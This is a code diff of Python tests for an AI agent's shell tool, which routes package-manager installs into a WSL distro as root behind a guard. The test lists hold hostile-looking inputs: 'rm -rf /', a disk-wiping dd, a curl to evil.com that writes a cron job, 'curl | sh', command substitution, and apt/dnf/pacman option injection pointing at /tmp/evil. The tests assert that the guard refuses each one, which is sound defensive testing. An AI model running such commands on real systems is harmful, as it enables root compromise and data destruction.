+    assert result.exit_code == 0
+    progress = [e for e in emitted if isinstance(e, ExecCommandOutputDeltaEvent)]
+    assert progress, "expected at least one progress delta"
+    assert progress[0].turn_id == "t1"
+    assert progress[0].tool_call_id == "c1"
+    assert "安装进行中" in progress[0].delta
+    # the callback must be wired through to the distro run
+    assert sandbox.last_on_output is not None
+
+
 async def test_not_routed_for_non_install_commands():
     manager = FakeSandboxManager(allow_system_installs=True, sandbox=FakeSandbox())
     tool = ExecTool(working_dir=".", sandbox_manager=manager)
@@ -690,6 +734,53 @@ async def test_not_routed_when_sandbox_manager_disabled():
     assert manager.get_or_create_calls == 0
 
 
+# ── CodeRabbit #820: network policy fails closed ────────────────────────
+
+
+async def test_route_refused_when_network_policy_blocks():
+    """A BLOCK_ALL selection must fail closed: a distro-side install
+    downloads packages, so routing it would fetch as root against the
+    policy's explicit no-network choice (CodeRabbit #820).  Currently
+    defensive — the policy engine only emits BLOCK_ALL for RESTRICTED
+    selections, which the chain never overrides — but the routed path
+    must never become the weaker path."""
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    selection = _make_selection(SandboxType.BWRAP)
+    selection.network_policy = NetworkSandboxPolicy.BLOCK_ALL
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get install -y texlive-xetex",
+        sandbox_selection=selection,
+        session_key="k",
+    )
+    assert result is not None
+    assert result.exit_code == 1
+    assert "禁止网络访问" in result.output
+    assert sandbox.install_calls == []  # never ran as root
+    assert manager.get_or_create_calls == 0  # no sandbox side-effect
+
+
+async def test_route_proceeds_when_network_allowed():
+    """The default ALLOW_ALL selection keeps routing (sanity check that the
+    new network check does not break the happy path)."""
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    selection = _make_selection(SandboxType.BWRAP)
+    selection.network_policy = NetworkSandboxPolicy.ALLOW_ALL
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get install -y texlive-xetex",
+        sandbox_selection=selection,
+        session_key="k",
+    )
+    assert result is not None
+    assert result.exit_code == 0
+    assert sandbox.install_calls[0][0] == "apt-get install -y texlive-xetex"
+
+
 # ── review N5: absolute-path package tokens refused ─────────────────────
 
 
@@ -733,6 +824,59 @@ async def test_guard_refuses_relative_path_package_tokens():
         "sudo apt-get install ~/evil.deb",
         "sudo apt-get install ~evil.deb",
         "sudo apt-get install /tmp/evil.deb",
+    ]:
+        result = await tool._maybe_route_system_install(
+            command,
+            sandbox_selection=_make_selection(),
+            session_key="k",
+        )
+        assert result is not None, command
+        assert result.exit_code == 1, command
+        assert sandbox.install_calls == [], command  # never ran as root
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        "apt-get install pkgs/evil.deb",
+        "apt-get install sessions/k/files/evil.deb",
+        "apt-get install x/evil.deb",
+        "apt-get install nginx/stable",  # pkg/rel — indistinguishable from a path
+    ],
+)
+async def test_guard_refuses_multi_segment_package_tokens(command):
+    """ANY slash in a package token is refused (CodeRabbit #820): a relative
+    multi-segment token ("pkgs/evil.deb") would let the agent's own
+    workspace file reach the distro's ROOT apt, which executes .deb
+    maintainer scripts — the same channel the leading-./ check closes.
+    The pkg/rel repo-qualifier form is dropped with it: it cannot be
+    reliably distinguished from a path and is rarely needed."""
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        command,
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is not None, command
+    assert result.exit_code == 1, command
+    assert sandbox.install_calls == [], command  # never ran as root
+
+
+async def test_guard_refuses_package_file_suffix_tokens():
+    """Package file suffixes are refused even without a slash (CodeRabbit
+    #820) — a bare .deb/.rpm/.apk argument is not a package spec."""
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    for command in [
+        "apt-get install evil.deb",
+        "apt-get install evil.rpm",
+        "apt-get install evil.apk",
+        "apt-get install evil.pkg.tar.zst",
     ]:
         result = await tool._maybe_route_system_install(
             command,
@@ -828,10 +972,11 @@ async def test_run_in_distro_root_wsl(monkeypatch):
     sandbox = _make_sandbox()
     captured = {}
 
-    async def fake_run(cmd, timeout=30.0, as_root=False):
+    async def fake_run(cmd, timeout=30.0, as_root=False, on_output=None):
         captured["cmd"] = cmd
         captured["timeout"] = timeout
         captured["as_root"] = as_root
+        captured["on_output"] = on_output
         return (0, "ok", "")
 
     monkeypatch.setattr(sandbox, "_run_linux_command", fake_run)
@@ -840,6 +985,24 @@ async def test_run_in_distro_root_wsl(monkeypatch):
     assert captured["cmd"] == "export DEBIAN_FRONTEND=noninteractive; apt-get install -y x"
     assert captured["as_root"] is True
     assert captured["timeout"] == 1200.0
+    assert captured["on_output"] is None  # no callback by default
+
+
+async def test_run_in_distro_root_forwards_on_output(monkeypatch):
+    """The progress callback must be forwarded to the underlying run."""
+    sandbox = _make_sandbox()
+    captured = {}
+
+    async def fake_run(cmd, timeout=30.0, as_root=False, on_output=None):
+        captured["on_output"] = on_output
+        return (0, "ok", "")
+
+    async def progress(text, name):
+        pass
+
+    monkeypatch.setattr(sandbox, "_run_linux_command", fake_run)
+    await sandbox.run_in_distro_root("apt-get install x", on_output=progress)
+    assert captured["on_output"] is progress
 
 
 async def test_run_in_distro_root_native_returns_error():
@@ -856,20 +1019,33 @@ async def test_run_linux_command_as_root_builds_wsl_args(monkeypatch):
     sandbox = _make_sandbox()
     captured = {}
 
+    class FakeStream:
+        def __init__(self, data):
+            self._data = data
+            self._pos = 0
+
+        async def read(self, n):
+            chunk = self._data[self._pos:self._pos + n]
+            self._pos += len(chunk)
+            return chunk
+
     async def fake_exec(*args, **kwargs):
         captured["args"] = args
 
         class P:
             returncode = 0
+            stdout = FakeStream(b"out")
+            stderr = FakeStream(b"")
 
-            async def communicate(self):
-                return (b"out", b"")
+            async def wait(self):
+                return 0
 
         return P()
 
     monkeypatch.setattr("miqi.sandbox.bwrap._create_subprocess_exec", fake_exec)
     rc, out, err = await sandbox._run_linux_command("echo hi", as_root=True)
     assert rc == 0
+    assert out == "out"
     assert list(captured["args"][:6]) == ["wsl.exe", "-d", "Ubuntu", "-u", "root", "--"]
 
 

--- a/tests/sandbox/test_system_install_routing.py
+++ b/tests/sandbox/test_system_install_routing.py
@@ -8,6 +8,8 @@ visible in every sandbox via the distro's ro-bind system dirs) when
 with an actionable message when it is not.
 """
 
+import asyncio
+
 import pytest
 
 from miqi.agent.tools.shell import ExecTool
@@ -534,6 +536,49 @@ async def test_execute_system_install_emits_progress(monkeypatch):
     assert sandbox.last_on_output is not None
 
 
+async def test_execute_system_install_timer_heartbeat_on_quiet_install(monkeypatch):
+    """A quiet install (no distro output at all) must still emit progress —
+    the heartbeat is timer-driven, not output-driven, so the 600 s drain
+    idle timeout cannot end the turn mid-install (CodeRabbit #820)."""
+    import miqi.agent.tools.shell as shell_mod
+    from miqi.protocol.events import ExecCommandOutputDeltaEvent
+
+    monkeypatch.setattr(shell_mod, "_INSTALL_PROGRESS_INTERVAL_SECONDS", 0.01)
+
+    emitted = []
+
+    class FakeEmitter:
+        async def emit(self, event):
+            emitted.append(event)
+
+    class QuietSandbox(FakeSandbox):
+        """Simulates an install that writes nothing to stdout/stderr."""
+
+        async def run_in_distro_root(self, command, timeout=1200.0, on_output=None):
+            self.install_calls.append((command, timeout))
+            self.last_on_output = on_output
+            await asyncio.sleep(0.1)  # quiet stretch longer than one interval
+            return (0, "", "")
+
+    sandbox = QuietSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get install -y texlive-xetex",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+        event_emitter=FakeEmitter(),
+        turn_id="t2",
+        tool_call_id="c2",
+    )
+    assert result is not None
+    assert result.exit_code == 0
+    progress = [e for e in emitted if isinstance(e, ExecCommandOutputDeltaEvent)]
+    assert progress, "timer heartbeat must fire even with no output"
+    assert "安装进行中" in progress[0].delta
+
+
 async def test_not_routed_for_non_install_commands():
     manager = FakeSandboxManager(allow_system_installs=True, sandbox=FakeSandbox())
     tool = ExecTool(working_dir=".", sandbox_manager=manager)
@@ -1047,6 +1092,104 @@ async def test_run_linux_command_as_root_builds_wsl_args(monkeypatch):
     assert rc == 0
     assert out == "out"
     assert list(captured["args"][:6]) == ["wsl.exe", "-d", "Ubuntu", "-u", "root", "--"]
+
+
+async def test_run_linux_command_timeout_keeps_tail(monkeypatch):
+    """A timed-out command must return the tail captured so far — the agent
+    needs the last diagnostic lines, not an empty timeout message
+    (CodeRabbit #820)."""
+    sandbox = _make_sandbox()
+
+    class SlowStream:
+        """Returns one chunk, then hangs like a stuck subprocess."""
+
+        def __init__(self, data):
+            self._data = data
+            self._pos = 0
+            self._served = False
+
+        async def read(self, n):
+            if not self._served:
+                self._served = True
+                chunk = self._data[self._pos:self._pos + n]
+                self._pos += len(chunk)
+                return chunk
+            await asyncio.sleep(3600)
+            return b""
+
+    async def fake_exec(*args, **kwargs):
+        class P:
+            returncode = None
+            stdout = SlowStream(b"partial-out")
+            stderr = SlowStream(b"partial-err")
+
+            def kill(self):
+                pass
+
+            async def wait(self):
+                return None
+
+        return P()
+
+    monkeypatch.setattr("miqi.sandbox.bwrap._create_subprocess_exec", fake_exec)
+    rc, out, err = await sandbox._run_linux_command(
+        "apt-get install texlive", timeout=0.05,
+    )
+    assert rc == -1
+    assert "partial-out" in out
+    assert "partial-err" in err
+    assert "timed out" in err.lower()
+
+
+async def test_run_in_distro_root_lock_timeout_returns_clear_error(monkeypatch):
+    """A held install lock (another install in progress) must surface as a
+    clear error after a bounded wait, not a silent hang until the outer
+    install timeout (CodeRabbit #820)."""
+    import threading
+
+    sandbox = _make_sandbox()
+    held = threading.Lock()
+    held.acquire()
+    monkeypatch.setattr("miqi.sandbox.bwrap._install_lock", held)
+    monkeypatch.setattr("miqi.sandbox.bwrap._INSTALL_LOCK_WAIT_TIMEOUT", 0.1)
+    rc, out, err = await sandbox.run_in_distro_root("apt-get install x")
+    assert rc == -1
+    assert "install lock" in err
+
+
+async def test_run_in_distro_root_lock_wait_emits_progress(monkeypatch):
+    """While queued behind the distro lock, progress notifications must be
+    emitted so the agent sees the install is waiting, not stalled
+    (CodeRabbit #820)."""
+    import threading
+
+    sandbox = _make_sandbox()
+    held = threading.Lock()
+    held.acquire()
+    monkeypatch.setattr("miqi.sandbox.bwrap._install_lock", held)
+    monkeypatch.setattr("miqi.sandbox.bwrap._INSTALL_LOCK_WAIT_TIMEOUT", 5.0)
+
+    notifications = []
+
+    async def progress(text, name):
+        notifications.append((text, name))
+
+    async def fake_run(cmd, timeout=30.0, as_root=False, on_output=None):
+        return (0, "ok", "")
+
+    monkeypatch.setattr(sandbox, "_run_linux_command", fake_run)
+
+    async def release_later():
+        await asyncio.sleep(0.3)
+        held.release()
+
+    release_task = asyncio.create_task(release_later())
+    rc, out, err = await sandbox.run_in_distro_root(
+        "apt-get install x", on_output=progress,
+    )
+    await release_task
+    assert rc == 0
+    assert any("distro 锁" in text for text, _ in notifications)
 
 
 # ── config ─────────────────────────────────────────────────────────────

--- a/tests/sandbox/test_system_install_routing.py
+++ b/tests/sandbox/test_system_install_routing.py
@@ -1,0 +1,885 @@
+"""Tests for system package install routing (#759).
+
+The bwrap sandbox is unprivileged (uid 1000) with read-only system dirs,
+so apt-get can never install inside it.  The fix routes install-family
+commands to the WSL distro as root (once, persistent across sessions,
+visible in every sandbox via the distro's ro-bind system dirs) when
+``tools.sandbox.allow_system_installs`` is enabled — and intercepts them
+with an actionable message when it is not.
+"""
+
+import pytest
+
+from miqi.agent.tools.shell import ExecTool
+from miqi.execution.sandbox_policy import SandboxSelection, SandboxType
+from miqi.protocol.permissions import (
+    FileSystemAccessMode,
+    FileSystemSandboxPolicy,
+    NetworkSandboxPolicy,
+)
+
+# ── fakes ──────────────────────────────────────────────────────────────
+
+
+class FakeSandbox:
+    """Minimal BwrapSandbox stand-in for routing tests."""
+
+    def __init__(
+        self,
+        *,
+        supports_system_installs: bool = True,
+        fail_rc: int = 0,
+    ):
+        self.is_running = True
+        self.supports_system_installs = supports_system_installs
+        self.fail_rc = fail_rc
+        self.install_calls: list[tuple[str, float]] = []
+
+    async def run_in_distro_root(self, command, timeout=1200.0):
+        self.install_calls.append((command, timeout))
+        if self.fail_rc:
+            return (self.fail_rc, "E: Unable to locate package evilpkg", "")
+        return (0, "Reading package lists... done\ninstalled texlive-xetex", "")
+
+
+class FakeSandboxManager:
+    """Minimal SandboxManager stand-in."""
+
+    def __init__(
+        self,
+        *,
+        allow_system_installs: bool = False,
+        enabled: bool = True,
+        initialized: bool = True,
+        sandbox: FakeSandbox | None = None,
+    ):
+        self.allow_system_installs = allow_system_installs
+        self.enabled = enabled
+        self._initialized = initialized
+        self._sandbox = sandbox
+        self.get_or_create_calls = 0
+
+    async def get_or_create(self, session_key):
+        self.get_or_create_calls += 1
+        return self._sandbox
+
+    @property
+    def active_sandbox(self):
+        return self._sandbox
+
+
+def _make_selection(sandbox_type: SandboxType = SandboxType.BWRAP) -> SandboxSelection:
+    return SandboxSelection(
+        sandbox_type=sandbox_type,
+        filesystem_policy=FileSystemSandboxPolicy(
+            default_mode=FileSystemAccessMode.READ,
+        ),
+        network_policy=NetworkSandboxPolicy.ALLOW_ALL,
+        timeout_ms=30_000,
+        reason="test",
+    )
+
+
+# ── command classification ─────────────────────────────────────────────
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        "sudo apt-get install -y texlive-xetex",
+        "apt-get install texlive-xetex",
+        "sudo apt update",
+        "apt update",
+        "yes | sudo apt-get install -y tectonic",
+        "sudo -n apt-get install -y fonts-noto-cjk",
+        "sudo dnf install -y gcc",
+        "yum update",
+        "zypper install -y python3",
+        "apk add build-base",
+        "sudo apk update",
+        "pacman -S texlive-most",
+        "pacman -Syu --noconfirm",
+        "sudo apt-get upgrade -y",
+        # flag clusters before the verb (long and short flags)
+        "apt-get -y install texlive-xetex",
+        "apt-get --assume-yes install texlive-xetex",
+        "sudo --preserve-env apt-get install texlive-xetex",
+        "sudo -E apt-get install -y texlive-xetex",
+        "dnf -y install gcc",
+        "zypper --non-interactive install python3",
+        "apk --no-cache add build-base",
+    ],
+)
+def test_is_system_install_command_matches(command):
+    assert ExecTool._is_system_install_command(command), command
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        "sudo apt-get remove texlive-xetex",  # remove is not auto-routed
+        "apt-get purge texlive",
+        "apt-get --version",
+        "echo sudo apt-get install x",  # not anchored at start
+        "ls -la",
+        "curl -sSfL https://example.com | sh",  # download-and-execute stays blocked
+        "sudo rm -rf /tmp/x",
+        "git clone https://github.com/x/y",
+        "apt-cache search texlive",  # apt-cache is a different binary
+        "pacman -Q texlive",  # query is not an install
+        "pacman -R texlive",  # remove is not an install
+    ],
+)
+def test_is_system_install_command_rejects(command):
+    assert not ExecTool._is_system_install_command(command), command
+
+
+# ── non-interactive injection ──────────────────────────────────────────
+
+
+@pytest.mark.parametrize(
+    "command,expected",
+    [
+        ("apt-get install texlive-xetex", "apt-get install -y texlive-xetex"),
+        ("apt-get install -y texlive-xetex", "apt-get install -y texlive-xetex"),
+        ("apt-get update", "apt-get update -y"),
+        ("apt install x", "apt install -y x"),
+        ("dnf install x", "dnf install -y x"),
+        ("yum install x", "yum install -y x"),
+        # zypper's silent flag is --non-interactive, NOT -y
+        ("zypper install python3", "zypper install --non-interactive python3"),
+        ("zypper -n install python3", "zypper -n install python3"),
+        ("zypper --non-interactive install python3", "zypper --non-interactive install python3"),
+        ("pacman -S texlive", "pacman -S --noconfirm texlive"),
+        ("pacman -Syu --noconfirm texlive", "pacman -Syu --noconfirm texlive"),
+        ("apk add build-base", "apk add build-base"),
+    ],
+)
+def test_inject_noninteractive_flags(command, expected):
+    assert ExecTool._inject_noninteractive_flags(command) == expected
+
+
+# ── deny re-check for root execution ───────────────────────────────────
+
+
+def test_guard_system_install_command_blocks_dangerous_compound():
+    tool = ExecTool(working_dir=".")
+    # The install family is fine on its own…
+    assert tool._guard_system_install_command("sudo apt-get install -y texlive") is None
+    # …but anything else dangerous must refuse the root routing.
+    assert tool._guard_system_install_command(
+        "sudo apt-get install -y x && rm -rf /"
+    ) is not None
+    assert tool._guard_system_install_command(
+        "sudo apt-get install -y x && dd if=/dev/zero of=/dev/sda"
+    ) is not None
+    assert tool._guard_system_install_command(
+        "yes | sudo apt-get install -y x | sh"
+    ) is not None
+
+
+def test_guard_system_install_command_blocks_shell_compounds():
+    """Root routing accepts ONLY a single install command.  Any shell
+    compound (&&/;/|/redirects/newlines/command substitution) after the
+    tolerated prefix would run arbitrary root operations on the distro."""
+    tool = ExecTool(working_dir=".")
+    blocked = [
+        "sudo apt-get install -y x && echo pwned > /etc/cron.d/evil",
+        "sudo apt-get install -y x ; chmod 777 /etc/shadow",
+        "sudo apt-get install -y x && curl -o /etc/cron.d/evil http://evil.com/x",
+        "sudo apt-get install -y x > /dev/null",
+        "apt-get install -y x < /dev/null",
+        "sudo apt-get install -y x\nrm -rf /etc",
+        "sudo apt-get install -y $(apt-get install y)",
+        "sudo apt-get install -y x `echo y`",
+        "sudo apt-get install -y x & rm -rf /",
+    ]
+    for command in blocked:
+        assert tool._guard_system_install_command(command) is not None, command
+    # the tolerated prefix itself is fine — these are single install commands
+    for command in [
+        "yes | sudo -n apt-get install -y texlive-xetex",
+        "sudo --preserve-env apt-get install texlive-xetex",
+        "sudo -E dnf install -y gcc",
+    ]:
+        assert tool._guard_system_install_command(command) is None, command
+
+
+def test_guard_system_install_command_blocks_option_injection():
+    """Package-manager options whose VALUE is a path (apt -o/-c, dnf
+    --config/--installroot/--pluginconfpath, pacman --config/--hookdir,
+    zypper --root) must never reach the root distro run — the manager
+    executes those paths as root (hooks/plugins/binaries), which is
+    arbitrary root code execution (review F1)."""
+    tool = ExecTool(working_dir=".")
+    blocked = [
+        "apt-get install -o Dir::Bin::dpkg=/tmp/evil x",
+        "apt-get install -c /tmp/evil.conf x",
+        "apt-get install --config /tmp/evil.conf x",
+        "apt-get install -oDir::Bin::dpkg=/tmp/evil x",
+        "apt-get update -o APT::Update::Pre-Invoke=/tmp/evil",
+        "dnf install --config=/tmp/dnf.conf x",
+        "dnf install --config /tmp/dnf.conf x",
+        "dnf install --pluginconfpath=/tmp/plugins x",
+        "dnf install --installroot=/tmp/root x",
+        "pacman -S --config /tmp/pacman.conf x",
+        "pacman -S --config=/tmp/pacman.conf x",
+        "pacman -S --hookdir /tmp/hooks x",
+        "zypper install --root /tmp/zypper x",
+        "apt-get install --allow-unauthenticated x",  # not on the safe-flag list
+        "apt-get install -y x && apt-get install -o Dir::Bin::dpkg=/tmp/evil y",
+    ]
+    for command in blocked:
+        assert tool._guard_system_install_command(command) is not None, command
+    # the safe-flag allowlist keeps the common cases working
+    allowed = [
+        "apt-get install -y x",
+        "apt-get install --no-install-recommends x y",
+        "apt-get update",
+        # note: apt-get dist-upgrade is refused too (review N1) — it removes
+        # packages and rewrites the whole distro as root; ./local.deb and
+        # other path-like tokens are refused too (review P1)
+        "dnf install -y gcc",
+        "dnf --nobest install gcc",
+        "pacman -Syu --noconfirm texlive",
+        "pacman -S --needed texlive",
+        "zypper -n install python3",
+        "apk add --no-cache build-base",
+        "apt-get install x=1.2.3",
+        "apt-get install x=1.0~rc1",
+        "apt-get install x:amd64",
+    ]
+    for command in allowed:
+        assert tool._guard_system_install_command(command) is None, command
+
+
+async def test_route_system_install_option_injection_never_reaches_distro():
+    """Option-injection commands are refused BEFORE the distro run."""
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        "apt-get install -o Dir::Bin::dpkg=/tmp/evil x",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is not None
+    assert result.exit_code == 1
+    assert "系统安装路由" in result.output
+    assert sandbox.install_calls == []  # never ran as root
+
+
+# ── ExecTool routing decisions ─────────────────────────────────────────
+
+
+async def test_route_system_install_when_enabled():
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(
+        allow_system_installs=True,
+        sandbox=sandbox,
+    )
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get install -y texlive-xetex",
+        sandbox_selection=_make_selection(SandboxType.BWRAP),
+        session_key="k",
+    )
+    assert result is not None
+    assert result.exit_code == 0
+    # sudo stripped, -y preserved, DEBIAN_FRONTEND added by run_in_distro_root
+    assert sandbox.install_calls[0][0] == "apt-get install -y texlive-xetex"
+    assert sandbox.install_calls[0][1] == 1200.0
+    # the agent must learn the install ran OUTSIDE the sandbox
+    assert "WSL 发行版中执行" in result.output
+
+
+async def test_route_system_install_strips_yes_sudo_flags():
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    await tool._maybe_route_system_install(
+        "yes | sudo -n apt-get install texlive-xetex",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert sandbox.install_calls[0][0] == "apt-get install -y texlive-xetex"
+
+
+async def test_route_system_install_strips_long_flags_before_verb():
+    """--preserve-env etc. before the verb must be stripped, not run."""
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    await tool._maybe_route_system_install(
+        "sudo --preserve-env apt-get install texlive-xetex",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert sandbox.install_calls[0][0] == "apt-get install -y texlive-xetex"
+
+
+async def test_route_system_install_passes_verb_side_flags_through():
+    """Flags between the binary and the verb are valid apt syntax — the
+    distro run keeps them untouched (no re-injection needed)."""
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    await tool._maybe_route_system_install(
+        "apt-get -y install texlive-xetex",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert sandbox.install_calls[0][0] == "apt-get -y install texlive-xetex"
+
+
+async def test_intercept_when_disabled():
+    manager = FakeSandboxManager(
+        allow_system_installs=False,
+        sandbox=FakeSandbox(),
+    )
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get install -y texlive-xetex",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is not None
+    assert result.exit_code == 1
+    # actionable guidance instead of the generic guard message
+    assert "allow_system_installs" in result.output
+    assert "被安全护栏拦截（检测到危险模式）" not in result.output
+
+
+async def test_intercept_wsl_only_on_native_linux():
+    manager = FakeSandboxManager(
+        allow_system_installs=True,
+        sandbox=FakeSandbox(supports_system_installs=False),
+    )
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get install -y texlive-xetex",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is not None
+    assert result.exit_code == 1
+    assert "仅支持 Windows + WSL" in result.output
+
+
+async def test_dangerous_compound_refused_before_root_run():
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get install -y x && rm -rf /",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is not None
+    assert result.exit_code == 1
+    assert "系统安装路由拒绝" in result.output
+    assert sandbox.install_calls == []  # never ran as root
+
+
+# ── approval wiring (review F2) ────────────────────────────────────────
+
+
+async def test_route_respects_approval_callback_deny(monkeypatch):
+    """A routed command hitting DANGEROUS_PATTERNS goes through the same
+    approval system as the normal path — the user can decline it."""
+    import miqi.agent.command_approval as ca
+
+    calls = []
+
+    def fake_check(command, approval_callback=None, **kwargs):
+        calls.append(command)
+        return {"approved": False, "message": "BLOCKED: user denied this command"}
+
+    monkeypatch.setattr(ca, "check_dangerous_command", fake_check)
+
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(
+        working_dir=".",
+        sandbox_manager=manager,
+        approval_callback=lambda *a, **k: "deny",
+    )
+
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get install -y x && rm -rf /",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is not None
+    assert result.exit_code == 1
+    assert "BLOCKED" in result.output
+    assert calls == ["sudo apt-get install -y x && rm -rf /"]
+    assert sandbox.install_calls == []  # approval denied → nothing ran
+
+
+async def test_route_respects_approval_callback_approve(monkeypatch):
+    """An approved routed command proceeds to the distro run."""
+    import miqi.agent.command_approval as ca
+
+    monkeypatch.setattr(
+        ca,
+        "check_dangerous_command",
+        lambda command, approval_callback=None, **kwargs: {"approved": True},
+    )
+
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(
+        working_dir=".",
+        sandbox_manager=manager,
+        approval_callback=lambda *a, **k: "once",
+    )
+
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get install -y texlive-xetex",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is not None
+    assert result.exit_code == 0
+    assert sandbox.install_calls[0][0] == "apt-get install -y texlive-xetex"
+
+
+# ── result metadata (reviews F4/F7) ────────────────────────────────────
+
+
+async def test_execute_system_install_failure_does_not_claim_success():
+    """A failed install must not carry the 'persistent install' success
+    hint — the agent must not misread failure as completion."""
+    sandbox = FakeSandbox(fail_rc=100)
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get install -y evilpkg",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is not None
+    assert result.exit_code == 100
+    assert "失败" in result.output
+    assert "安装跨会话持久" not in result.output
+    assert "Exit code: 100" in result.output
+
+
+async def test_route_result_sandbox_type_is_bwrap():
+    """Routed results report the bwrap sandbox context, not 'none'."""
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get install -y texlive-xetex",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is not None
+    assert result.sandbox_type == "bwrap"
+
+
+async def test_not_routed_for_non_install_commands():
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=FakeSandbox())
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        "ls -la",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is None
+
+
+async def test_not_routed_when_orchestrator_selected_none():
+    """An explicit NONE selection (direct host exec) is never overridden."""
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=FakeSandbox())
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get install -y texlive-xetex",
+        sandbox_selection=_make_selection(SandboxType.NONE),
+        session_key="k",
+    )
+    assert result is None
+
+
+async def test_not_routed_without_sandbox_manager():
+    tool = ExecTool(working_dir=".")
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get install -y texlive-xetex",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is None
+
+
+async def test_execute_end_to_end_routing():
+    """Full execute() path: routed install returns its output."""
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    output = await tool.execute(
+        "sudo apt-get install -y texlive-xetex",
+        _session_key="k",
+    )
+    assert "installed texlive-xetex" in output
+    assert sandbox.install_calls[0][0] == "apt-get install -y texlive-xetex"
+
+
+async def test_execute_end_to_end_intercepted_when_disabled():
+    manager = FakeSandboxManager(
+        allow_system_installs=False,
+        sandbox=FakeSandbox(),
+    )
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    output = await tool.execute(
+        "sudo apt-get install -y texlive-xetex",
+        _session_key="k",
+    )
+    assert "allow_system_installs" in output
+
+
+# ── exec environment description ───────────────────────────────────────
+
+
+def test_describe_exec_environment_install_guidance_enabled():
+    from miqi.sandbox.manager import describe_exec_environment
+
+    manager = FakeSandboxManager(
+        allow_system_installs=True,
+        enabled=True,
+        initialized=True,
+    )
+    text = describe_exec_environment(manager)
+    assert "系统包安装已开启" in text
+    assert "跨会话持久" in text
+    # review F6/N6: the WSL-only caveat must be visible even when the
+    # option is on, so a native-Linux setup reads the real limitation.
+    assert "仅 Windows + WSL 生效" in text
+
+
+# ── review N1: dist-upgrade family refused ─────────────────────────────
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        "sudo apt-get dist-upgrade -y",
+        "sudo apt full-upgrade -y",
+        "sudo apt-get update && sudo apt-get dist-upgrade -y",
+        "apt-get -y dist-upgrade",
+    ],
+)
